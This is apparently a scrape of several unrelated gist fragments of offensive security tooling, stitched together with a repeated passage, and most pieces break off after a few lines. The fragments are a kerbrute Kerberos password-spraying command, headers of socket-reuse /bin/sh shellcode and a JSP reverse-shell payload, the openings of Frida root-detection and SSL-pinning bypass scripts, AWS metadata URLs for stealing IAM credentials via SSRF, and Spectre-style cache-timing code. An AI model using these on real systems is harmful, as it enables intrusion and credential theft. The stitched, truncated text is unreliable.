With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
; Linux x86-64 - Execve ("/bin/sh") Socket Reuse | |
; Length: 79 bytes | |
; Date: 21/03/2021 | |
; Author: Puttimate "Jusmistic" Thammasaeng | |
; Tested on: x86_64 Debian GNU/Linux | |
; Socket Reuse x86-64 | |
; 1. Finding sockfd using getpeername function. | |
; 2. Call dup2 sockfd with 0,1 and 2. | |
; 3. Execute /bin/sh. |
// $ frida -l antiroot.js -U -f com.example.app --no-pause | |
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh): | |
// - I added extra whitelisted items to deal with the latest versions | |
// of RootBeer/Cordova iRoot as of August 6, 2019 | |
// - The original one just fucked up (kill itself) if Magisk is installed lol | |
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
Java.perform(function() { | |
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
/* Android ssl certificate pinning bypass script for various methods | |
by Maurizio Siddu | |
Run with: | |
frida -U -f <APP_ID> -l frida_multiple_unpinning.js [--no-pause] | |
*/ | |
setTimeout(function() { | |
Java.perform(function() { | |
console.log(''); |
<% | |
/* | |
* Copyright (C) 2018 Nicolas Mauger - JSP payload | |
* Two way of reverse shell : in html and with TCP port. | |
* | |
* ---------------------------------------------------------------------------- | |
* "THE BEER-WARE LICENSE" (Revision 42): | |
* <nicolas@mauger.cafe> wrote this file. As long as you retain this notice | |
* you can do whatever you want with this stuff. If we meet some day, and you | |
* think this stuff is worth it, you can buy me a beer in return. Nicolas. |
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt",on) | |
#else | |
#include <x86intrin.h> /* for rdtscp and clflush */ | |
#endif |
global _time_load | |
global _cache_flush | |
global _run_attempt | |
extern _bools | |
extern _values | |
extern _pointers | |
section .text |
// Instrucciones | |
// Ctrl + Shift + C | |
// Click en cualquier elemento | |
// Seleccionar pestaña Consola | |
// Pegar el script y presionar Enter | |
// Cerra la ventana y podes usar los atajos de las teclas siguientes: | |
// Ctrl + z :: Full Screen | |
// Ctrl + x :: Hiden Options | |
// Ctrl + c :: Show Options |